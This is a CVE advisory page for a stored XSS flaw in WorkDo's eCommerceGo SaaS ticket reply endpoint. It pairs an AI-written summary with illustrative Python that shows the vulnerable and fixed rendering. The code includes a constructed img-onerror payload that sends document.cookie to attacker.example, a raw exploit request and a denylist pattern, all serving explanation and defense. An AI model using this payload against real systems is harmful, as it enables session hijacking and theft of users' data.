CVE-2025-40978
Description
Stored Cross-Site Scripting (XSS) vulnerability in WorkDo's eCommerceGo SaaS, caused by a lack of proper validation of user input: an attacker can plant the payload by sending a POST request to ‘/ticket/x/conversion’ with a crafted ‘reply_description’ parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Stored XSS in WorkDo eCommerceGo SaaS via unsanitized 'reply_description' parameter in POST to '/ticket/x/conversion'.
Vulnerability
CVE-2025-40978 is a stored cross-site scripting (XSS) vulnerability in WorkDo's eCommerceGo SaaS application. The root cause is a lack of proper validation of user input supplied through the reply_description parameter in a POST request to the endpoint /ticket/x/conversion [1].
Exploitation
An authenticated attacker with low privileges can send a crafted POST request to /ticket/x/conversion containing malicious JavaScript in the reply_description parameter. The value is stored verbatim, without sanitization, and is later rendered unencoded into the ticket conversation page, so the script executes in the browser of whoever loads that view [1]. User interaction (viewing the affected page) is therefore required for the payload to trigger, but no further action by the victim is needed once the page is opened.
Impact
Successful exploitation lets the attacker run arbitrary script in the victim's browser session within the eCommerceGo SaaS application context. Because the script executes with the victim's session, it can read or act on anything the victim is permitted to see or do in the application, which enables session hijacking, defacement, or redirection to malicious sites and compromises the confidentiality and integrity of the affected application's data [1]. Marking the session cookie HttpOnly limits cookie theft but does not stop the script from issuing requests in the victim's name.
Mitigation
As of the publication date, no official patch or solution has been reported by WorkDo; the INCIBE advisory indicates that no fix is currently available [1]. Organizations running eCommerceGo SaaS should monitor vendor updates. Operators who can modify their deployment should apply contextual output encoding (HTML-entity encoding of reply_description wherever it is rendered), which is the actual fix, and may add input validation on the /ticket/x/conversion handler as a stopgap. Restricting which accounts may post ticket replies and deploying a Content Security Policy reduce exposure until a vendor patch is available.
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
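The request described under Exploitation and the output-encoding fix recommended under Mitigation, shown side by side as an added example. This is not code from WorkDo, from eCommerceGo SaaS or from the advisory: the endpoint path and parameter name are those given in the CVE description, while the payload, the in-memory ticket store, the Host and Cookie headers, the length limit and the denylist helper are constructed for illustration.

```python
import html
import re
from urllib.parse import urlencode


# Endpoint and parameter name are those given in the CVE description; the
# payload below is a constructed example, not one from the advisory.
TICKET_ENDPOINT = "/ticket/x/conversion"
ATTACKER_REPLY = (
    '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'
)


def build_exploit_request(reply_text: str) -> str:
    """Raw HTTP request a low-privileged user would send to plant the payload.
    Form encoding, the Host value and the session cookie are assumptions."""
    body = urlencode({"reply_description": reply_text})
    return (
        f"POST {TICKET_ENDPOINT} HTTP/1.1\r\n"
        "Host: ecommercego.example\r\n"
        "Cookie: session=<attacker-session>\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
        f"{body}"
    )


class TicketStore:
    """In-memory stand-in for the application's ticket conversation table."""

    def __init__(self) -> None:
        self.replies: dict[str, list[str]] = {}

    def handle_reply_post(self, ticket_id: str, form: dict) -> None:
        # The flaw: reply_description is persisted exactly as received.
        self.replies.setdefault(ticket_id, []).append(form["reply_description"])


def render_vulnerable(store: TicketStore, ticket_id: str) -> str:
    """Renders stored replies by raw interpolation: the payload reaches the
    victim's browser as markup and the onerror handler fires on page load."""
    items = "".join(
        f"<div class='reply'>{r}</div>" for r in store.replies.get(ticket_id, [])
    )
    return f"<div id='conversation'>{items}</div>"


def render_fixed(store: TicketStore, ticket_id: str) -> str:
    """Same view with contextual output encoding for an HTML element body.
    html.escape(quote=True) turns < > & ' and double quotes into entities, so
    the stored text is displayed literally instead of parsed as markup."""
    items = "".join(
        f"<div class='reply'>{html.escape(r, quote=True)}</div>"
        for r in store.replies.get(ticket_id, [])
    )
    return f"<div id='conversation'>{items}</div>"


# Stopgap input check for the period with no vendor patch. It is a denylist
# and therefore bypassable; the output encoding above is the real fix.
_ACTIVE_MARKUP = re.compile(
    r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE
)


def reply_looks_like_markup(reply_text: str) -> bool:
    return bool(_ACTIVE_MARKUP.search(reply_text))


def handle_reply_post_hardened(store: TicketStore, ticket_id: str, form: dict) -> bool:
    """Reject replies carrying tags, event handlers or javascript: URLs, and
    cap the length (5000 is an assumed limit). Returns False when rejected."""
    text = form.get("reply_description", "")
    if len(text) > 5000 or reply_looks_like_markup(text):
        return False
    store.handle_reply_post(ticket_id, {"reply_description": text})
    return True


if __name__ == "__main__":
    store = TicketStore()
    store.handle_reply_post("x", {"reply_description": ATTACKER_REPLY})
    print(build_exploit_request(ATTACKER_REPLY))
    print("vulnerable view:", render_vulnerable(store, "x"))
    print("fixed view:     ", render_fixed(store, "x"))
```

Running the block prints the attacker's request, then the same stored reply rendered twice: the vulnerable view contains the `<img … onerror=…>` tag verbatim, the fixed view contains `&lt;img … onerror=&quot;…`, which a browser displays as text. The denylist helper is deliberately kept separate from the encoding so that removing it does not reopen the hole.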
Affected products: 1
Patches: 0 (no patches discovered yet)
Vulnerability mechanics: AI mechanics synthesis has not run for this CVE yet.
References: 1 (cited as [1] above)
News mentions: 0 (no linked articles in our index yet)